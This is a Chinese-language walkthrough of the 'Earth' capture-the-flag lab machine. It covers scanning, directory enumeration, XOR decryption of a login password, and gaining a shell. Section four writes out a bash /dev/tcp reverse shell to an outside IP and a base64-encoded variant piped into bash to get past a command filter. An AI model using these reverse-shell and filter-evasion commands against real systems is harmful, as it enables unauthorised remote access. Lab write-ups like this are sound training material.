Earth靶机攻略
一.环境准备
1.1Earth靶机环境准备
首先将我们解压好的的Earth.ova放入虚拟机里,并配置环境
将网络连接换成NET连接
二.信息搜集
2.1ip搜集
2.1.1使用netdiscover命令扫描靶机的ip地址,发现地址为192.168.182.137
2.2端口扫描
2.2.1使用nmap工具对目标机进行端口扫描,发现开启21了端口,且发现有Dns,80端口无法访问,因此需要修改hosts配置文件,
sudo vim /etc/hosts
2.3目录扫描
2.3.1使用kali的dirb进行目录扫描,使用dirb扫描这两个不同的域名,以及443https服务下的域名,发现四个结果几乎都是这样,只有https的terratest结果不一样
2.3.2访问https://terratest.earth.local/robots.txt,发现以下文件,且最后面有一个testingnotes.*就是什么后缀名都可以,但是notes明显应该是txt后缀2.
2.3.3访问testingnotes.txt,正常访问访问不到,使用该url访问,https://terratest.earth.local//testingnotes.txt,内容如图
2.3.4打开后我们拿到了一个用户名 terra,并且这里告诉了我们一个加密方式是利用XOR异或方式加密的,testdata.txt其实就是我们的密钥,而密文就是我们主页面最下面这一串16进制的数字,我们可以看出来这里面最大的数就是F,所以肯定是一个16进制的数字
三.漏洞利用
3.1解密,登录
3.1.1用 python 脚本去解密,获得key,仔细看不难发现都是围着这个来循环的
key:
3.1.2前往登录页面登录
账号: terra密码:earthclimatechangebad4humans
四.开启监听并触发反弹shell
4.1
4.1.1发现这是一个命令执行页面,看可不可以将木马写入里面,不行,尝试使用反弹shell
finalshell监听66端口:
4.1.2尝试反弹shell:bash -c 'exec bash -i &>/dev/tcp/101.201.175.92/66 <&1' 被禁止
使用base64编码,使用这个命令查看base64加密后的结果:
将刚才加密的密文进行解密,在刚才界面去执行这段代码
echo YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguMTgyLjEzMC82NiA8JjEK | base64 -d | bash
4.1.3执行命令
earth靶机练习到此结束
2025.7.26 18:55